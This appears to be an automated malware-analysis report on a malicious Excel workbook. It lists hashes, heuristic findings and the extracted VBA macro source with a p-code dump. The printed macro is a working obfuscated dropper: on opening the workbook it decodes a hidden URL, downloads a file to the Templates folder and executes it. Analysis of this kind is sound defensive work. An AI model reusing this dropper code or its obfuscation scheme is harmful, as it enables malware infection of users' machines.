Office (OLE) / .XLS malware analysis — malicious · 837a60eae5e6d574

MALICIOUS

Office (OLE) / .XLS

226.0 KB Created: 2020-05-16 13:49:11 Authoring application: Microsoft Excel First seen: 2026-06-09

MD5: 19fa4dc06e58d32781bae06f93188c60 SHA-1: b16a30bbb17ffb2a43526bab7b3b711781d1e298 SHA-256: 837a60eae5e6d574401dcd42e6c7887fca676691907cfa696026a5f72eb62d6d

268 Risk Score

Heuristics 7

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    Set WshShell = CreateObject("WScript.Shell")
```

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.

Matched line in script

»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µ = ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾.responseBody

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set WshShell = CreateObject("WScript.Shell")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25505 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	25505 bytes
SHA-256: `ddb7ac6549b47ec0971fbe9fb09561fd63d7746700f0a5f9e6f1638c1738ea4e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Cil() End Sub Attribute VB_Name = "Hjfmkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Function ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬(¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡) ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ = " ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥" ·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼ = " ¿¡@#$%^&()_+\|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY" For i = 1 To Len(¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡) ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤ = InStr(·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼, Mid(¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡, i, 1)) If ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤ > 0 Then ¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º = Mid(·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼, ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤, 1) ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ = ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ + ¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º Else ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ = ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ + Mid(¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡, i, 1) End If Next ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬ = ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ End Function Private Sub Workbook_Open() Dim WshShell As Object Dim BSpecialPathB As String Dim ·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼® As Integer ·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼® = Chr(50) + Chr(48) + Chr(48) Set WshShell = CreateObject("WScript.Shell") BSpecialPathB = WshShell.SpecialFolders("Templates") Dim ¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º Dim »ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µ Dim ¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼ Dim ¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸ Dim «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ Dim °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ As Integer Dim ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾ Dim ¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹ °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ = 1 Set ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾ = CreateObject("microsoft.xmlhttp") Set «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ = CreateObject("Shell.Application") ¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸ = BSpecialPathB + ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬("\N§KJââ.ÂÛÂ") ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾.Open "get", ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬("hÖÖÓÕ://ÅlÒÀÖvÒÀÖÄÅ.ÜdÅÕ.ÂÙ/ÁÂÙkÂÅÔgÖÒÃÃÄÁÂÀÃÅmÒÃÃÄkÂÅÔgÖÂÔ/ÂÖwÂÖjkdÅgjÂdÃlkkÖgÂÔkÖgÅÂÔÖhÂÔgÔgÂÔgÂ/ÕÂÔÛÁvÂÔ1.ÂÛÂ"), False ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾.send »ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µ = ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾.responseBody If ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾.Status = 200 Then Set ¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º = CreateObject("adodb.stream") ¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º.Open ¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º.Type = °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ ¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º.Write »ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µ ¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º.SaveToFile ¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸, °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ + °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ ¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º.Close End If «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³.Open (¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸) End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True ' Processing file: /opt/analyzer/scan_staging/a013e1f12840431f978ff4c3181f2066.bin ' =============================================================================== ' Module streams: ' _VBA_PROJECT_CUR/VBA/Module1 - 958 bytes ' Line #0: ' FuncDefn (Sub °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³()) ' Line #1: ' Line #2: ' EndSub ' _VBA_PROJECT_CUR/VBA/Hjfmkbook - 5368 bytes ' Line #0: ' FuncDefn (Public Function ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤(¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º, id_FFFE As Variant)) ' Line #1: ' LitStr 0x006E " ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥" ' St ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ ' Line #2: ' LitStr 0x006E " ¿¡@#$%^&()_+\|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY" ' St BSpecialPathB ' Line #3: ' StartForVariable ' Ld Workbook_Open ' EndForVariable ' LitDI2 0x0001 ' Ld ¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º ' FnLen ' For ' Line #4: ' Ld ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ ' Ld ¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º ' Ld Workbook_Open ' LitDI2 0x0001 ' ArgsLd Mid 0x0003 ' FnInStr ' St id_0280 ' Line #5: ' Ld id_0280 ' LitDI2 0x0000 ' Gt ' IfBlock ' Line #6: ' Ld BSpecialPathB ' Ld id_0280 ' LitDI2 0x0001 ' ArgsLd Mid 0x0003 ' St id_0282 ' Line #7: ' Ld id_0284 ' Ld id_0282 ' Add ' St id_0284 ' Line #8: ' ElseBlock ' Line #9: ' Ld id_0284 ' Ld ¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º ' Ld Workbook_Open ' LitDI2 0x0001 ' ArgsLd Mid 0x0003 ' Add ' St id_0284 ' Line #10: ' EndIfBlock ' Line #11: ' StartForVariable ' Next ' Line #12: ' Ld id_0284 ' St ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤ ' Line #13: ' EndFunc ' Line #14: ' Line #15: ' Line #16: ' FuncDefn (Private Sub Chr()) ' Line #17: ' Dim ' VarDefn CreateObject (As Object) ' Line #18: ' Dim ' VarDefn id_0286 (As String) ' Line #19: ' Dim ' VarDefn ¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼ (As Integer) ' Line #20: ' LitDI2 0x0032 ' ArgsLd ¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹ 0x0001 ' LitDI2 0x0030 ' ArgsLd ¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹ 0x0001 ' Add ' LitDI2 0x0030 ' ArgsLd ¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹ 0x0001 ' Add ' St ¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼ ' Line #21: ' Line #22: ' Line #23: ' SetStmt ' LitStr 0x000D "WScript.Shell" ' ArgsLd ¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥ 0x0001 ' Set CreateObject ' Line #24: ' LitStr 0x0009 "Templates" ' Ld CreateObject ' ArgsMemLd ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯ 0x0001 ' St id_0286 ' Line #25: ' Dim ' VarDefn «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ ' Line #26: ' Dim ' VarDefn °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ ' Line #27: ' Dim ' VarDefn ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾ ' Line #28: ' Dim ' VarDefn ¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹ ' Line #29: ' Dim ' VarDefn ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬ ' Line #30: ' Dim ' VarDefn ¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡ 